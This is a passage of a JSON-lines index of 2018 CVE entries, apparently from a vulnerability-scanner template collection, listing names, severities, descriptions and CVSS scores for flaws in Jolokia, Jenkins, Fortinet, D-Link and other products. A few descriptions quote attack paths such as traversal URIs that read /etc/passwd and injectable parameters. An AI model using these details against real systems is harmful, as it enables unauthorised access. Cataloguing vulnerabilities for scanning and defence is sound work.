Firepower 9300 ASA Security Module, FTD Virtual (FTDv). Cisco Bug IDs: CSCvi16029.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-0296.yaml"} +{"ID":"CVE-2018-1000129","Info":{"Name":"Jolokia 1.3.7 - Cross-Site Scripting","Severity":"medium","Description":"Jolokia 1.3.7 is vulnerable to cross-site scripting in the HTTP servlet and allows an attacker to execute malicious JavaScript in the victim's browser.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-1000129.yaml"} +{"ID":"CVE-2018-1000130","Info":{"Name":"Jolokia Agent - JNDI Code Injection","Severity":"high","Description":"Jolokia agent is vulnerable to a JNDI injection vulnerability that allows a remote attacker to run arbitrary Java code on the server when the agent is in proxy mode.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"cves/2018/CVE-2018-1000130.yaml"} +{"ID":"CVE-2018-1000226","Info":{"Name":"Cobbler - Authentication Bypass","Severity":"critical","Description":"Cobbler versions 2.6.11+, but code inspection suggests at least 2.0.0+ and possibly even older versions, may be vulnerable to an authentication bypass vulnerability in XMLRPC API (/cobbler_api) that can result in privilege escalation, data manipulation or exfiltration, and LDAP credential harvesting. This attack appear to be exploitable via \"network connectivity\". Taking advantage of improper validation of security tokens in API endpoints. Please note this is a different issue than CVE-2018-10931.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-1000226.yaml"} +{"ID":"CVE-2018-1000533","Info":{"Name":"GitList \u003c 0.6.0 Remote Code Execution","Severity":"critical","Description":"klaussilveira GitList version \u003c= 0.6 contains a passing incorrectly sanitized input via the `searchTree` function that can result in remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-1000533.yaml"} +{"ID":"CVE-2018-1000600","Info":{"Name":"Jenkins GitHub Plugin \u003c=1.29.1 - Server-Side Request Forgery","Severity":"high","Description":"Jenkins GitHub Plugin 1.29.1 and earlier is susceptible to server-side request forgery via GitHubTokenCredentialsCreator.java, which allows attackers to leverage attacker-specified credentials IDs obtained through another method and capture the credentials stored in Jenkins.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2018/CVE-2018-1000600.yaml"} +{"ID":"CVE-2018-1000671","Info":{"Name":"Sympa version =\u003e6.2.16 - Cross-Site Scripting","Severity":"medium","Description":"Sympa version 6.2.16 and later contains a URL Redirection to Untrusted Site vulnerability in the referer parameter of the wwsympa fcgi login action that can result in open redirection and reflected cross-site scripting via data URIs.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-1000671.yaml"} +{"ID":"CVE-2018-1000856","Info":{"Name":"DomainMOD 4.11.01 - Cross-Site Scripting","Severity":"medium","Description":"DomainMOD 4.11.01 is vulnerable to cross-site scripting via the segments/add.php Segment Name field.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"cves/2018/CVE-2018-1000856.yaml"} +{"ID":"CVE-2018-1000861","Info":{"Name":"Jenkins - Remote Command Injection","Severity":"critical","Description":"Jenkins 2.153 and earlier and LTS 2.138.3 and earlier are susceptible to a remote command injection via stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-1000861.yaml"} +{"ID":"CVE-2018-10093","Info":{"Name":"AudioCode 420HD - Remote Code Execution","Severity":"high","Description":"AudioCodes IP phone 420HD devices using firmware version 2.2.12.126 allow remote code execution.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2018/CVE-2018-10093.yaml"} +{"ID":"CVE-2018-10095","Info":{"Name":"Dolibarr \u003c7.0.2 - Cross-Site Scripting","Severity":"medium","Description":"Dolibarr before 7.0.2 is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via the foruserlogin parameter to adherents/cartes/carte.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-10095.yaml"} +{"ID":"CVE-2018-10141","Info":{"Name":"Palo Alto Networks PAN-OS GlobalProtect \u003c8.1.4 - Cross-Site Scripting","Severity":"medium","Description":"Palo Alto Networks PAN-OS before 8.1.4 GlobalProtect Portal Login page allows an unauthenticated attacker to inject arbitrary JavaScript or HTML, making it vulnerable to cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-10141.yaml"} +{"ID":"CVE-2018-10201","Info":{"Name":"Ncomputing vSPace Pro 10 and 11 - Directory Traversal","Severity":"high","Description":"Ncomputing vSpace Pro versions 10 and 11 suffer from a directory traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-10201.yaml"} +{"ID":"CVE-2018-10230","Info":{"Name":"Zend Server \u003c9.13 - Cross-Site Scripting","Severity":"medium","Description":"Zend Server before version 9.13 is vulnerable to cross-site scripting via the debug_host parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-10230.yaml"} +{"ID":"CVE-2018-10562","Info":{"Name":"Dasan GPON Devices - Remote Code Execution","Severity":"critical","Description":"Dasan GPON home routers are susceptible to command injection which can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-10562.yaml"} +{"ID":"CVE-2018-10818","Info":{"Name":"LG NAS Devices - Remote Code Execution","Severity":"critical","Description":"LG NAS devices contain a pre-auth remote command injection via the \"password\" parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2018/CVE-2018-10818.yaml"} +{"ID":"CVE-2018-10822","Info":{"Name":"D-Link Routers - Local File Inclusion","Severity":"high","Description":"D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after \"GET /uir\" in an HTTP request to the web interface.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-10822.yaml"} +{"ID":"CVE-2018-10823","Info":{"Name":"D-Link Routers - Remote Command Injection","Severity":"high","Description":"D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 device may allow an authenticated attacker to execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2018/CVE-2018-10823.yaml"} +{"ID":"CVE-2018-10956","Info":{"Name":"IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion","Severity":"high","Description":"IPConfigure Orchid Core VMS 2.0.5 is susceptible to local file inclusion.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-10956.yaml"} +{"ID":"CVE-2018-11231","Info":{"Name":"Opencart Divido - Sql Injection","Severity":"high","Description":"OpenCart Divido plugin is susceptible to SQL injection\n","Classification":{"CVSSScore":"8.10"}},"file_path":"cves/2018/CVE-2018-11231.yaml"} +{"ID":"CVE-2018-11409","Info":{"Name":"Splunk Sensitive Information Disclosure","Severity":"medium","Description":"Splunk through 7.0.1 allows information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2018/CVE-2018-11409.yaml"} +{"ID":"CVE-2018-11709","Info":{"Name":"WordPress wpForo Forum \u003c= 1.4.11 - Cross-Site Scripting","Severity":"medium","Description":"WordPress wpForo Forum plugin before 1.4.12 for WordPress allows unauthenticated reflected cross-site scripting via the URI.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-11709.yaml"} +{"ID":"CVE-2018-11759","Info":{"Name":"Apache Tomcat JK Connect \u003c=1.2.44 - Manager Access","Severity":"high","Description":"Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 allows specially constructed requests to expose application functionality through the reverse proxy. It is also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd. While there is some overlap between this issue and CVE-2018-1323, they are not identical.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-11759.yaml"} +{"ID":"CVE-2018-11776","Info":{"Name":"Apache Struts2 S2-057 - Remote Code Execution","Severity":"high","Description":"Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible remote code execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn''t have value and action set and in same time, its upper package have no or wildcard namespace.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"cves/2018/CVE-2018-11776.yaml"} +{"ID":"CVE-2018-11784","Info":{"Name":"Apache Tomcat - Open Redirect","Severity":"medium","Description":"Apache Tomcat versions prior to 9.0.12, 8.5.34, and 7.0.91 are prone to an open-redirection vulnerability because it fails to properly sanitize user-supplied input.","Classification":{"CVSSScore":"4.3"}},"file_path":"cves/2018/CVE-2018-11784.yaml"} +{"ID":"CVE-2018-12031","Info":{"Name":"Eaton Intelligent Power Manager 1.6 - Directory Traversal","Severity":"critical","Description":"Eaton Intelligent Power Manager v1.6 allows an attacker to include a file via directory traversal, which can lead to sensitive information disclosure, denial of service and code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-12031.yaml"} +{"ID":"CVE-2018-12054","Info":{"Name":"Schools Alert Management Script - Arbitrary File Read","Severity":"high","Description":"Schools Alert Management Script is susceptible to an arbitrary file read vulnerability via the f parameter in img.php, aka absolute path traversal.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-12054.yaml"} +{"ID":"CVE-2018-1207","Info":{"Name":"Dell iDRAC7/8 Devices - Remote Code Injection","Severity":"critical","Description":"Dell EMC iDRAC7/iDRAC8, versions prior to 2.52.52.52, contain a CGI injection vulnerability\nwhich could be used to execute remote code. A remote unauthenticated attacker may\npotentially be able to use CGI variables to execute remote code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-1207.yaml"} +{"ID":"CVE-2018-12095","Info":{"Name":"OEcms 3.1 - Cross-Site Scripting","Severity":"medium","Description":"OEcms 3.1 is vulnerable to reflected cross-site scripting via the mod parameter of info.php.","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2018/CVE-2018-12095.yaml"} +{"ID":"CVE-2018-12296","Info":{"Name":"Seagate NAS OS 4.3.15.1 - Server Information Disclosure","Severity":"high","Description":"Seagate NAS OS version 4.3.15.1 has insufficient access control which allows attackers to obtain information about the NAS without authentication via empty POST requests in /api/external/7.0/system.System.get_infos.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-12296.yaml"} +{"ID":"CVE-2018-12300","Info":{"Name":"Seagate NAS OS 4.3.15.1 - Open Redirect","Severity":"medium","Description":"Seagate NAS OS 4.3.15.1 contains an open redirect vulnerability in echo-server.html, which can allow an attacker to disclose information in the referer header via the state URL parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-12300.yaml"} +{"ID":"CVE-2018-12613","Info":{"Name":"PhpMyAdmin \u003c4.8.2 - Local File Inclusion","Severity":"high","Description":"PhpMyAdmin before version 4.8.2 is susceptible to local file inclusion that allows an attacker to include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the \"$cfg['AllowArbitraryServer'] = true\" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the \"$cfg['ServerDefault'] = 0\" case (which bypasses the login requirement and runs the vulnerable code without any authentication).","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2018/CVE-2018-12613.yaml"} +{"ID":"CVE-2018-12634","Info":{"Name":"CirCarLife Scada \u003c4.3 - System Log Exposure","Severity":"critical","Description":"CirCarLife Scada before 4.3 allows remote attackers to obtain sensitive information via a direct request for the html/log or services/system/info.html URI. CirCarLife is an internet-connected electric vehicle charging station.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-12634.yaml"} +{"ID":"CVE-2018-12675","Info":{"Name":"SV3C HD Camera L Series - Open Redirect","Severity":"medium","Description":"SV3C HD Camera L Series 2.3.4.2103-S50-NTD-B20170508B and 2.3.4.2103-S50-NTD-B20170823B contains an open redirect vulnerability. It does not perform origin checks on URLs in the camera's web interface, which can be leveraged to send a user to an unexpected endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-12675.yaml"} +{"ID":"CVE-2018-1271","Info":{"Name":"Spring MVC Framework - Local File Inclusion","Severity":"medium","Description":"Spring MVC Framework versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported are vulnerable to local file inclusion because they allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). A malicious user can send a request using a specially crafted URL that can lead a directory traversal attack.","Classification":{"CVSSScore":"5.9"}},"file_path":"cves/2018/CVE-2018-1271.yaml"} +{"ID":"CVE-2018-1273","Info":{"Name":"Spring Data Commons - Remote Code Execution","Severity":"critical","Description":"Spring Data Commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5,\nand older unsupported versions, contain a property binder vulnerability\ncaused by improper neutralization of special elements.\nAn unauthenticated remote malicious user (or attacker) can supply\nspecially crafted request parameters against Spring Data REST backed HTTP resources\nor using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-1273.yaml"} +{"ID":"CVE-2018-12998","Info":{"Name":"Zoho manageengine - Cross-Site Scripting","Severity":"medium","Description":"Zoho manageengine is vulnerable to reflected cross-site scripting. This impacts Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-12998.yaml"} +{"ID":"CVE-2018-1335","Info":{"Name":"Apache Tika \u003c1.1.8- Header Command Injection","Severity":"high","Description":"Apache Tika versions 1.7 to 1.17 allow clients to send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients.","Classification":{"CVSSScore":"8.1"}},"file_path":"cves/2018/CVE-2018-1335.yaml"} +{"ID":"CVE-2018-13379","Info":{"Name":"Fortinet FortiOS - Credentials Disclosure","Severity":"critical","Description":"Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal).","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-13379.yaml"} +{"ID":"CVE-2018-13380","Info":{"Name":"Fortinet FortiOS - Cross-Site Scripting","Severity":"medium","Description":"Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal are vulnerable to cross-site scripting and allows attacker to execute unauthorized malicious script code via the error or message handling parameters.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-13380.yaml"} +{"ID":"CVE-2018-13980","Info":{"Name":"Zeta Producer Desktop CMS \u003c14.2.1 - Local File Inclusion","Severity":"medium","Description":"Zeta Producer Desktop CMS before 14.2.1 is vulnerable to local file inclusion if the plugin \"filebrowser\" is installed because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal.","Classification":{"CVSSScore":"5.5"}},"file_path":"cves/2018/CVE-2018-13980.yaml"} +{"ID":"CVE-2018-14013","Info":{"Name":"Synacor Zimbra Collaboration Suite Collaboration \u003c8.8.11 - Cross-Site Scripting","Severity":"medium","Description":"Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 is vulnerable to cross-site scripting via the AJAX and html web clients.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-14013.yaml"} +{"ID":"CVE-2018-14064","Info":{"Name":"VelotiSmart Wifi - Directory Traversal","Severity":"critical","Description":"VelotiSmart WiFi B-380 camera devices allow directory traversal via the uc-http service 1.0.0, as demonstrated by /../../etc/passwd on TCP port 80.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-14064.yaml"} +{"ID":"CVE-2018-14474","Info":{"Name":"Orange Forum 1.4.0 - Open Redirect","Severity":"medium","Description":"Orange Forum 1.4.0 contains an open redirect vulnerability in views/auth.go via the next parameter to /login or /signup. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-14474.yaml"} +{"ID":"CVE-2018-14574","Info":{"Name":"Django - Open Redirect","Severity":"medium","Description":"Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 contains an open redirect vulnerability. If django.middleware.common.CommonMiddleware and APPEND_SLASH settings are selected, and if the project has a URL pattern that accepts any path ending in a slash, an attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-14574.yaml"} +{"ID":"CVE-2018-14728","Info":{"Name":"Responsive filemanager 9.13.1 Server-Side Request Forgery","Severity":"critical","Description":"Responsive filemanager 9.13.1 is susceptible to server-side request forgery in upload.php via the url parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-14728.yaml"} +{"ID":"CVE-2018-14912","Info":{"Name":"cgit \u003c 1.2.1 - Directory Traversal","Severity":"high","Description":"cGit \u003c 1.2.1 via cgit_clone_objects has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-14912.yaml"} +{"ID":"CVE-2018-14916","Info":{"Name":"Loytec LGATE-902 \u003c6.4.2 - Local File Inclusion","Severity":"critical","Description":"Loytec LGATE-902 versions prior to 6.4.2 suffers from a local file inclusion vulnerability.","Classification":{"CVSSScore":"9.1"}},"file_path":"cves/2018/CVE-2018-14916.yaml"} +{"ID":"CVE-2018-14918","Info":{"Name":"LOYTEC LGATE-902 6.3.2 - Local File Inclusion","Severity":"high","Description":"LOYTEC LGATE-902 6.3.2 is susceptible to local file inclusion which could allow an attacker to manipulate path references and access files and directories (including critical system files) that are stored outside the root folder of the web application running on the device. This can be used to read and configuration files containing, e.g., usernames and passwords.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-14918.yaml"} +{"ID":"CVE-2018-14931","Info":{"Name":"Polarisft Intellect Core Banking Software Version 9.7.1 - Open Redirect","Severity":"medium","Description":"Polarisft Intellect Core Banking Software Version 9.7.1 is susceptible to an open redirect issue in the Core and Portal modules via the /IntellectMain.jsp?IntellectSystem= URI.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-14931.yaml"} +{"ID":"CVE-2018-15138","Info":{"Name":"LG-Ericsson iPECS NMS 30M - Local File Inclusion","Severity":"high","Description":"Ericsson-LG iPECS NMS 30M allows local file inclusion via ipecs-cm/download?filename=../ URIs.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-15138.yaml"} +{"ID":"CVE-2018-15517","Info":{"Name":"D-Link Central WifiManager - Server-Side Request Forgery","Severity":"high","Description":"D-Link Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using a browser.","Classification":{"CVSSScore":"8.6"}},"file_path":"cves/2018/CVE-2018-15517.yaml"} +{"ID":"CVE-2018-15535","Info":{"Name":"Responsive FileManager \u003c9.13.4 - Local File Inclusion","Severity":"high","Description":"Responsive FileManager before version 9.13.4 is vulnerable to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory, aka local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-15535.yaml"} +{"ID":"CVE-2018-15745","Info":{"Name":"Argus Surveillance DVR 4.0.0.0 - Local File Inclusion","Severity":"high","Description":"Argus Surveillance DVR 4.0.0.0 devices allow unauthenticated local file inclusion, leading to file disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-15745.yaml"} +{"ID":"CVE-2018-15961","Info":{"Name":"Adobe ColdFusion - Unrestricted File Upload Remote Code Execution","Severity":"critical","Description":"Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-15961.yaml"} +{"ID":"CVE-2018-16059","Info":{"Name":"WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion","Severity":"medium","Description":"WirelessHART Fieldgate SWG70 3.0 is vulnerable to local file inclusion via the fcgi-bin/wgsetcgi filename parameter.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2018/CVE-2018-16059.yaml"} +{"ID":"CVE-2018-16133","Info":{"Name":"Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion","Severity":"medium","Description":"Cybrotech CyBroHttpServer 1.0.3 is vulnerable to local file inclusion in the URI.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2018/CVE-2018-16133.yaml"} +{"ID":"CVE-2018-16139","Info":{"Name":"BIBLIOsoft BIBLIOpac 2008 - Cross-Site Scripting","Severity":"medium","Description":"BIBLIOsoft BIBLIOpac 2008 contains a cross-site scripting vulnerability via the db or action parameter to bin/wxis.exe/bibliopac/, which allows a remote attacker to inject arbitrary web script or HTML.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-16139.yaml"} +{"ID":"CVE-2018-16167","Info":{"Name":"LogonTracer \u003c=1.2.0 - Remote Command Injection","Severity":"critical","Description":"LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-16167.yaml"} +{"ID":"CVE-2018-16283","Info":{"Name":"WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion","Severity":"critical","Description":"WordPress Wechat Broadcast plugin 1.2.0 and earlier allows Directory Traversal via the Image.php url parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-16283.yaml"} +{"ID":"CVE-2018-16288","Info":{"Name":"LG SuperSign EZ CMS 2.5 - Local File Inclusion","Severity":"high","Description":"LG SuperSign CMS 2.5 allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs - aka local file inclusion.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"cves/2018/CVE-2018-16288.yaml"} +{"ID":"CVE-2018-16299","Info":{"Name":"WordPress Localize My Post 1.0 - Local File Inclusion","Severity":"high","Description":"WordPress Localize My Post 1.0 is susceptible to local file inclusion via the ajax/include.php file parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-16299.yaml"} +{"ID":"CVE-2018-16341","Info":{"Name":"Nuxeo \u003c10.3 - Remote Code Execution","Severity":"high","Description":"Nuxeo prior to version 10.3 is susceptible to an unauthenticated remote code execution vulnerability via server-side template injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2018/CVE-2018-16341.yaml"} +{"ID":"CVE-2018-16668","Info":{"Name":"CirCarLife SCADA Installation Paths","Severity":"medium","Description":"System software installation path disclosure due to lack of authentication","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2018/CVE-2018-16668.yaml"} +{"ID":"CVE-2018-16670","Info":{"Name":"CirCarLife SCADA PLC Status","Severity":"medium","Description":"PLC status disclosure due to lack of authentication","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2018/CVE-2018-16670.yaml"} +{"ID":"CVE-2018-16671","Info":{"Name":"CirCarLife SCADA Device ID","Severity":"medium","Description":"System software information disclosure due to lack of authentication","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2018/CVE-2018-16671.yaml"} +{"ID":"CVE-2018-16716","Info":{"Name":"NCBI ToolBox - Directory Traversal","Severity":"critical","Description":"NCBI ToolBox 2.0.7 through 2.2.26 legacy versions contain a path traversal vulnerability via viewcgi.cgi which may result in reading of arbitrary files (i.e., significant information disclosure) or file deletion via the nph-viewgif.cgi query string.","Classification":{"CVSSScore":"9.1"}},"file_path":"cves/2018/CVE-2018-16716.yaml"} +{"ID":"CVE-2018-16761","Info":{"Name":"Eventum \u003c3.4.0 - Open Redirect","Severity":"medium","Description":"Eventum before 3.4.0 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-16761.yaml"} +{"ID":"CVE-2018-16763","Info":{"Name":"FUEL CMS 1.4.1 - Remote Code Execution","Severity":"critical","Description":"FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-16763.yaml"} +{"ID":"CVE-2018-16836","Info":{"Name":"Rubedo CMS \u003c=3.4.0 - Directory Traversal","Severity":"critical","Description":"Rubedo CMS through 3.4.0 contains a directory traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-16836.yaml"} +{"ID":"CVE-2018-17246","Info":{"Name":"Kibana - Local File Inclusion","Severity":"critical","Description":"Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-17246.yaml"} +{"ID":"CVE-2018-17254","Info":{"Name":"Joomla! JCK Editor SQL Injection","Severity":"critical","Description":"The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-17254.yaml"} +{"ID":"CVE-2018-17422","Info":{"Name":"DotCMS \u003c 5.0.2 - Open Redirect","Severity":"medium","Description":"dotCMS before 5.0.2 contains multiple open redirect vulnerabilities via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-17422.yaml"} +{"ID":"CVE-2018-17431","Info":{"Name":"Comodo Unified Threat Management Web Console - Remote Code Execution","Severity":"critical","Description":"Comodo Firewall \u0026 Central Manager (UTM) All Release before 2.7.0 \u0026 1.5.0 are susceptible to a web shell based remote code execution vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-17431.yaml"} +{"ID":"CVE-2018-18069","Info":{"Name":"WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting","Severity":"medium","Description":"WordPress plugin sitepress-multilingual-cms 3.6.3 is vulnerable to cross-site scripting in process_forms via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-18069.yaml"} +{"ID":"CVE-2018-18264","Info":{"Name":"Kubernetes Dashboard \u003c1.10.1 - Authentication Bypass","Severity":"high","Description":"Kubernetes Dashboard before 1.10.1 allows attackers to bypass authentication and use Dashboard's Service Account for reading secrets within the cluster.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-18264.yaml"} +{"ID":"CVE-2018-18323","Info":{"Name":"Centos Web Panel 0.9.8.480 - Local File Inclusion","Severity":"high","Description":"Centos Web Panel version 0.9.8.480 suffers from local file inclusion vulnerabilities. Other vulnerabilities including cross-site scripting and remote code execution are also known to impact this version.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-18323.yaml"} +{"ID":"CVE-2018-18570","Info":{"Name":"Planon \u003cLive Build 41 - Cross-Site Scripting","Severity":"medium","Description":"Planon before Live Build 41 is vulnerable to cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-18570.yaml"} +{"ID":"CVE-2018-18608","Info":{"Name":"DedeCMS 5.7 SP2 - Cross-Site Scripting","Severity":"medium","Description":"DedeCMS 5.7 SP2 is vulnerable to cross-site scripting via the function named GetPageList 